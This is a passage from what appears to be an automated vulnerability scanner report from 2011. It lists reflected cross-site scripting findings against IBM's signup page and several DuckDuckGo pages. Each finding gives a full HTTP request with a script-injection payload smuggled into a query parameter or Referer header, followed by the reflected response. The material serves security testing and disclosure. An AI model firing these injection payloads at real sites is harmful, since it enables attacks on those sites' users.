219ecgbi4120fe44f000024250c61hbg69cg5&asynchronous=pod&i=labor+day&s=11&fp=1") {    
    recalculate("recalculate.jsp?id=MSP262219ecgbi4120fe44f000024250c61hbg69cg5&asynchronous=pod&s=11&fp=1&i=labor%20day&76d96"-alert(1)-"0e67745c3bd=1");
}

});
/* ]]>
...[SNIP]...

3.200. https://www14.software.ibm.com/webapp/iwm/web/signup.do [ck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www14.software.ibm.com
Path:   /webapp/iwm/web/signup.do

Request

GET /webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software9e233"><script>alert(1)</script>9397ad22b9d&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22 HTTP/1.1
Host: www14.software.ibm.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:30:08 GMT
Server: IBM_HTTP_Server
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Set-Cookie: JSESSIONID=0000E-xzo66v00mxYzIlN4750VL:-1; Path=/
Content-Length: 67320


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:
...[SNIP]...
<a href="/webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software9e233"><script>alert(1)</script>9397ad22b9d&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22">
...[SNIP]...

3.201. https://www14.software.ibm.com/webapp/iwm/web/signup.do [cm parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www14.software.ibm.com
Path:   /webapp/iwm/web/signup.do

Request

GET /webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k5090c"><script>alert(1)</script>1a96ced61b8&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22 HTTP/1.1
Host: www14.software.ibm.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:30:00 GMT
Server: IBM_HTTP_Server
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Set-Cookie: JSESSIONID=0000gO8IZg5GJQycWQPexUluWag:-1; Path=/
Content-Length: 67320


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:
...[SNIP]...
<a href="/webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k5090c"><script>alert(1)</script>1a96ced61b8&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22">
...[SNIP]...

3.202. https://www14.software.ibm.com/webapp/iwm/web/signup.do [cmp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www14.software.ibm.com
Path:   /webapp/iwm/web/signup.do

Request

GET /webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=000008ba58"><script>alert(1)</script>d98038b851d&mkwid=sbqlaimsi_7690207419_432jmv5154/x22 HTTP/1.1
Host: www14.software.ibm.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:30:10 GMT
Server: IBM_HTTP_Server
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Set-Cookie: JSESSIONID=0000iq7tvdpDE4j3mL0agZtqeQc:-1; Path=/
Content-Length: 67320


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:
...[SNIP]...
<a href="/webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=000008ba58"><script>alert(1)</script>d98038b851d&mkwid=sbqlaimsi_7690207419_432jmv5154/x22">
...[SNIP]...

3.203. https://www14.software.ibm.com/webapp/iwm/web/signup.do [cr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www14.software.ibm.com
Path:   /webapp/iwm/web/signup.do

Request

GET /webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google1af2a"><script>alert(1)</script>5ffbc7300df&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22 HTTP/1.1
Host: www14.software.ibm.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:30:02 GMT
Server: IBM_HTTP_Server
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Set-Cookie: JSESSIONID=0000-CXBDaoLY4nHCmAK6zV4PBI:-1; Path=/
Content-Length: 67320


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:
...[SNIP]...
<a href="/webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google1af2a"><script>alert(1)</script>5ffbc7300df&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22">
...[SNIP]...

3.204. https://www14.software.ibm.com/webapp/iwm/web/signup.do [csr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www14.software.ibm.com
Path:   /webapp/iwm/web/signup.do

Request

GET /webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117d200c"><script>alert(1)</script>6c7450ed2d9&cm=k&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22 HTTP/1.1
Host: www14.software.ibm.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:29:58 GMT
Server: IBM_HTTP_Server
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Set-Cookie: JSESSIONID=0000GCArT-1PDBlbT_LQCkC6TyG:-1; Path=/
Content-Length: 67320


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:
...[SNIP]...
<a href="/webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117d200c"><script>alert(1)</script>6c7450ed2d9&cm=k&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22">
...[SNIP]...

3.205. https://www14.software.ibm.com/webapp/iwm/web/signup.do [ct parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www14.software.ibm.com
Path:   /webapp/iwm/web/signup.do

Request

GET /webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google&ct=100DN4GWf22e7"><script>alert(1)</script>84e8fbf3eea&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22 HTTP/1.1
Host: www14.software.ibm.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:30:03 GMT
Server: IBM_HTTP_Server
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Set-Cookie: JSESSIONID=0000qQP8LaAzV4rqEyTOAQJuZm5:-1; Path=/
Content-Length: 67320


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:
...[SNIP]...
<a href="/webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google&ct=100DN4GWf22e7"><script>alert(1)</script>84e8fbf3eea&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22">
...[SNIP]...

3.206. https://www14.software.ibm.com/webapp/iwm/web/signup.do [mkwid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www14.software.ibm.com
Path:   /webapp/iwm/web/signup.do

Request

GET /webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22fdcaa"><script>alert(1)</script>9a515e2d34d HTTP/1.1
Host: www14.software.ibm.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:30:12 GMT
Server: IBM_HTTP_Server
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Set-Cookie: JSESSIONID=0000-1-xrYLgeRYlirNuvDyhMn8:-1; Path=/
Content-Length: 67320


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:
...[SNIP]...
/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22fdcaa"><script>alert(1)</script>9a515e2d34d">
...[SNIP]...

3.207. https://www14.software.ibm.com/webapp/iwm/web/signup.do [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www14.software.ibm.com
Path:   /webapp/iwm/web/signup.do

Request

GET /webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22&439fe"><script>alert(1)</script>0ba8f26f2b2=1 HTTP/1.1
Host: www14.software.ibm.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:30:13 GMT
Server: IBM_HTTP_Server
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Set-Cookie: JSESSIONID=00005jmudmVwN90N_S_Y-2phUjm:-1; Path=/
Content-Length: 67330


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:
...[SNIP]...
iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22&439fe"><script>alert(1)</script>0ba8f26f2b2=1">
...[SNIP]...

3.208. http://duckduckgo.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://duckduckgo.com
Path:   /

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?q=labor+day HTTP/1.1
Host: duckduckgo.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=2763d'-alert(1)-'c96d2d1c7b1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 01:59:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Tue, 01 Mar 2011 01:59:27 GMT
Cache-Control: max-age=1
Content-Length: 7500

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta name="robots" content="noindex,nofollow"><meta http-equiv="content-type" content="text/html;
...[SNIP]...
<script type="text/javascript">var fq,r1c,r2c,ric,rfq,rq,rds,rt,y,y1,ti,tig,ka,kb,kc,kd,ke,kf,kg,kh,ki,kj,kl,km,kn,ko,kp,kq,kr,ks,kt,ku,kv,kw,kx,ky,kz;fq=0;fd=1;it=0;iaq=0;r1hc=0;r1c=0;r2c=0;ric=1;rq='2763d'-alert(1)-'c96d2d1c7b1';rfq=1;rt='';rv='';rad='';rds=20;rs=0;kl='';kp='';ks='';kw='';ka='';kt='';ky='';kk='';kf='';kc='';ke='';kr='';ko='';kj='';kz='';kg='';kh='';kd='';ki='';kn='';kb='';km='';ku='';kq='';kv='';kx='';</scri
...[SNIP]...

3.209. http://duckduckgo.com/Assan_language [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://duckduckgo.com
Path:   /Assan_language

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Assan_language HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;
Referer: http://www.google.com/search?hl=en&q=fe031'-alert(1)-'894d4d00e71

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:47:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Expires: Tue, 01 Mar 2011 02:47:16 GMT
Cache-Control: max-age=1
Content-Length: 8529

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="canonical" href="http://duckduckgo.com/c/Yeniseian_languages"/><meta http-equiv="conten
...[SNIP]...
<script type="text/javascript">var fq,r1c,r2c,ric,rfq,rq,rds,rt,y,y1,ti,tig,ka,kb,kc,kd,ke,kf,kg,kh,ki,kj,kl,km,kn,ko,kp,kq,kr,ks,kt,ku,kv,kw,kx,ky,kz;fq=0;fd=1;it=1;iaq=0;r1hc=0;r1c=1;r2c=2;ric=3;rq='fe031'-alert(1)-'894d4d00e71';rfq=1;rt='';rv='';rad='en.wikipedia.org';rds=20;rs=0;kl='';kp='';ks='';kw='';ka='';kt='';ky='';kk='';kf='';kc='';ke='';kr='';ko='';kj='';kz='';kg='';kh='';kd='';ki='';kn='';kb='';km='';ku='';kq='';kv
...[SNIP]...

3.210. http://duckduckgo.com/Cross-site_scripting [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://duckduckgo.com
Path:   /Cross-site_scripting

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Cross-site_scripting HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;
Referer: http://www.google.com/search?hl=en&q=cc8c8'-alert(1)-'a97d2817fca

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:47:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Expires: Tue, 01 Mar 2011 02:47:18 GMT
Cache-Control: max-age=1
Content-Length: 13177

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="canonical" href="http://duckduckgo.com/c/Web_security_exploits"/><meta http-equiv="cont
...[SNIP]...
script type="text/javascript">var fq,r1c,r2c,ric,rfq,rq,rds,rt,y,y1,ti,tig,ka,kb,kc,kd,ke,kf,kg,kh,ki,kj,kl,km,kn,ko,kp,kq,kr,ks,kt,ku,kv,kw,kx,ky,kz;fq=0;fd=1;it=1;iaq=0;r1hc=0;r1c=7;r2c=6;ric=13;rq='cc8c8'-alert(1)-'a97d2817fca';rfq=1;rt='';rv='';rad='en.wikipedia.org';rds=20;rs=0;kl='';kp='';ks='';kw='';ka='';kt='';ky='';kk='';kf='';kc='';ke='';kr='';ko='';kj='';kz='';kg='';kh='';kd='';ki='';kn='';kb='';km='';ku='';kq='';kv
...[SNIP]...

3.211. http://duckduckgo.com/HTTP_referrer [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://duckduckgo.com
Path:   /HTTP_referrer

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /HTTP_referrer HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;
Referer: http://www.google.com/search?hl=en&q=4c75c'-alert(1)-'1b74049d74f

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:54:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Expires: Tue, 01 Mar 2011 02:55:00 GMT
Cache-Control: max-age=1
Content-Length: 8717

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="canonical" href="http://duckduckgo.com/c/HTTP_headers"/><meta http-equiv="content-type"
...[SNIP]...
<script type="text/javascript">var fq,r1c,r2c,ric,rfq,rq,rds,rt,y,y1,ti,tig,ka,kb,kc,kd,ke,kf,kg,kh,ki,kj,kl,km,kn,ko,kp,kq,kr,ks,kt,ku,kv,kw,kx,ky,kz;fq=0;fd=1;it=1;iaq=0;r1hc=0;r1c=1;r2c=3;ric=3;rq='4c75c'-alert(1)-'1b74049d74f';rfq=1;rt='';rv='';rad='en.wikipedia.org';rds=20;rs=0;kl='';kp='';ks='';kw='';ka='';kt='';ky='';kk='';kf='';kc='';ke='';kr='';ko='';kj='';kz='';kg='';kh='';kd='';ki='';kn='';kb='';km='';ku='';kq='';kv
...[SNIP]...

3.212. http://duckduckgo.com/Microsoft_Visual_Studio [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://duckduckgo.com
Path:   /Microsoft_Visual_Studio

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Microsoft_Visual_Studio HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;
Referer: http://www.google.com/search?hl=en&q=b2728'-alert(1)-'b073c849a2c

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:47:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Expires: Tue, 01 Mar 2011 02:47:16 GMT
Cache-Control: max-age=1
Content-Length: 9475

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="canonical" href="http://duckduckgo.com/c/Microsoft_Visual_Studio"/><meta http-equiv="co
...[SNIP]...
<script type="text/javascript">var fq,r1c,r2c,ric,rfq,rq,rds,rt,y,y1,ti,tig,ka,kb,kc,kd,ke,kf,kg,kh,ki,kj,kl,km,kn,ko,kp,kq,kr,ks,kt,ku,kv,kw,kx,ky,kz;fq=0;fd=1;it=1;iaq=0;r1hc=0;r1c=2;r2c=2;ric=5;rq='b2728'-alert(1)-'b073c849a2c';rfq=1;rt='';rv='';rad='en.wikipedia.org';rds=20;rs=0;kl='';kp='';ks='';kw='';ka='';kt='';ky='';kk='';kf='';kc='';ke='';kr='';ko='';kj='';kz='';kg='';kh='';kd='';ki='';kn='';kb='';km='';ku='';kq='';kv
...[SNIP]...

3.213. http://duckduckgo.com/NaN [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://duckduckgo.com
Path:   /NaN

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /NaN HTTP/1.1
Host: duckduckgo.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=fbcde'-alert(1)-'e8ddd594df0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlMzczNjM5MmY5OTgxY2Y0MjBkNjIzZDg1ZDBiNzA0MmE%3D--3e8d70a971450d94414e9de9c563709ccf72716e; r=b

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:04:47 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Tue, 01 Mar 2011 02:04:48 GMT
Cache-Control: max-age=1
Content-Length: 9228

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="canonical" href="http://duckduckgo.com/c/Computing_acronyms"/><meta http-equiv="content
...[SNIP]...
<script type="text/javascript">var fq,r1c,r2c,ric,rfq,rq,rds,rt,y,y1,ti,tig,ka,kb,kc,kd,ke,kf,kg,kh,ki,kj,kl,km,kn,ko,kp,kq,kr,ks,kt,ku,kv,kw,kx,ky,kz;fq=0;fd=1;it=1;iaq=0;r1hc=0;r1c=2;r2c=3;ric=5;rq='fbcde'-alert(1)-'e8ddd594df0';rfq=1;rt='';rv='';rad='en.wikipedia.org';rds=20;rs=0;kl='';kp='';ks='';kw='';ka='';kt='';ky='';kk='';kf='';kc='';ke='';kr='';ko='';kj='';kz='';kg='';kh='';kd='';ki='';kn='';kb='';km='';ku='';kq='';kv
...[SNIP]...

3.214. http://duckduckgo.com/User_agent [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://duckduckgo.com
Path:   /User_agent

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /User_agent HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;
Referer: http://www.google.com/search?hl=en&q=b290c'-alert(1)-'64b49af1d9d

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:55:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Expires: Tue, 01 Mar 2011 02:55:02 GMT
Cache-Control: max-age=1
Content-Length: 9737

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="canonical" href="http://duckduckgo.com/c/HTTP_headers"/><meta http-equiv="content-type"
...[SNIP]...
<script type="text/javascript">var fq,r1c,r2c,ric,rfq,rq,rds,rt,y,y1,ti,tig,ka,kb,kc,kd,ke,kf,kg,kh,ki,kj,kl,km,kn,ko,kp,kq,kr,ks,kt,ku,kv,kw,kx,ky,kz;fq=0;fd=1;it=1;iaq=0;r1hc=0;r1c=2;r2c=6;ric=5;rq='b290c'-alert(1)-'64b49af1d9d';rfq=1;rt='';rv='';rad='en.wikipedia.org';rds=20;rs=0;kl='';kp='';ks='';kw='';ka='';kt='';ky='';kk='';kf='';kc='';ke='';kr='';ko='';kj='';kz='';kg='';kh='';kd='';ki='';kn='';kb='';km='';ku='';kq='';kv
...[SNIP]...

3.215. http://duckduckgo.com/c/Computer_arithmetic [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://duckduckgo.com
Path:   /c/Computer_arithmetic

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/Computer_arithmetic HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;
Referer: http://www.google.com/search?hl=en&q=ac320'-alert(1)-'ffcf9437e4e

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:49:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Expires: Tue, 01 Mar 2011 02:49:55 GMT
Cache-Control: max-age=1
Content-Length: 59532

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="canonical" href="http://duckduckgo.com/c/Computer_arithmetic"/><meta http-equiv="conten
...[SNIP]...
ript type="text/javascript">var fq,r1c,r2c,ric,rfq,rq,rds,rt,y,y1,ti,tig,ka,kb,kc,kd,ke,kf,kg,kh,ki,kj,kl,km,kn,ko,kp,kq,kr,ks,kt,ku,kv,kw,kx,ky,kz;fq=0;fd=0;it=1;iaq=0;r1hc=0;r1c=126;r2c=0;ric=37;rq='ac320'-alert(1)-'ffcf9437e4e';rfq=1;rt='';rv='';rad='';rds=0;rs=1;kl='';kp='';ks='';kw='';ka='';kt='';ky='';kk='';kf='';kc='';ke='';kr='';ko='';kj='';kz='';kg='';kh='';kd='';ki='';kn='';kb='';km='';ku='';kq='';kv='';kx='';</scrip
...[SNIP]...

